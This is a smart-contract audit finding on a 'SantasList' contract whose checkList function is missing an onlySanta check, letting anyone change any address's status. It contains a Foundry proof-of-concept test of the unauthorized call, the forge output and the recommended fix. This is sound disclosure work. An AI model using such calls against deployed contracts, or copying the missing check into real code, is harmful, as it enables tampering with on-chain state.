Submission Details
Severity:
Anyone can call checkList function
Summary
For this Vulnerability, function checkList fails to perform a check to confirm that caller is santa
Vulnerability Details
Anyone (address) can call the checkList function to change the STATUS of any address passed to the function, thereby affecting the
mapping(address person => Status naughtyOrNice) private s_theListCheckedOnce;
Impact
TEST
// impact of checkList function
function testCheckList() public {
address alice = makeAddr("alice");
// using an address that is not santa to call `checkList` function
vm.startPrank(user);
santasList.checkList(alice, SantasList.Status.NICE);
SantasList.Status aliceStatus = santasList.getNaughtyOrNiceOnce(alice);
vm.stopPrank();
console.logUint(uint(aliceStatus));
assertEq(uint(aliceStatus), 0);
}
RESULT
Running the test on your terminal using the command:
forge test --match-path ./test/SantasListPOCTest.t.sol -vv
gives
Running 1 test for test/SantasListPOCTest.t.sol:SantasListPOCTest
[PASS] testCheckList() (gas: 20563)
Logs:
0
Tools Used
Manual review
Recommendations
Include the modifier onlySanta after the visibility of the checkList function declaration.
// checkList function with modifier
function checkList(address person, Status status) external onlySanta {
s_theListCheckedOnce[person] = status;
emit CheckedOnce(person, status);
}
Updates
Lead Judging Commences
inallhonesty almost 2 years ago
Submission Judgement Published Assigned finding tags:
Access Control on checkList()
Anyone is able to call checkList() changing the status of a provided address. This is not intended functionality and is meant to be callable by only Santa.
Rewards breakdown
nSLOC
116This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.